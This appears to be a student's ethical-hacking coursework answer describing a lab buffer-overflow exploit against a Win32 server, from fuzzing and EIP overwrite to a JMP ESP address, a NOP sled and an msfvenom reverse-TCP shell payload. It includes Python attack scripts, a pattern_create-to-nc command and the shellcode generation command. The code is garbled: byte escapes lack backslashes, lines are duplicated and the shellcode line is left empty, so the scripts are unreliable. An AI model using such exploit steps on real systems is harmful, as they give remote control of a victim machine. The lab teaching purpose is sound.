CSI5208 Ethical Hacking And Defence

Answer

Exploit development is conducted to gaining control over a computer system while taking advantages of the bugs and vulnerability allowing privilege escalation or a denial of service attack. The development process contains several phases and need to complete the previous one to move further.

Initiation phase: the whole development process was conducted on Linux platform. Firstly, Win32 buffer victim virtual machine needs to be opened after opening the Kali virtual machine. These two virtual machines need to be set to NAT networking while checking the iP address of both machines.

Overflow:

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

port = int(sys.argv[2]) # Testing buffer = "x41"*500 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port)) s.send(buffer) s.close()

In the windows host, immediate debugger needs to open and run the server.exe. the exection process was started by pressing F9 key. Then a python file was created with the name”arrack.py”. Python codes are attached. Then the command “python attack.py IP_ADDRESS 1337”. The IP address is the address of the windows virtual machine. Then we swap to the Windows environment and press shift+F9 to pass the exception to the executable.

We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of memory which contains our injected value.  

Weaponzing the vulnerability:

In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger. Then the execution process was initiated by pressing F9. The directory also needs to be change into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run “./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must determine an address for code which will jump to ESP.

The attack.py modified as follows:

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

# EIP is overwritten at 260 bytes

buffer = "x41"*260

# Overwrite EIP with JMP ESP

buffer += "x78x16xF3x77"

# NOPSLED

buffer += "x90"*128

# Shellcode

buffer +=

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port))

s.send(buffer)

s.close()

Shellcode

1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f pythonwhere <KALI_IP> is the IP address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.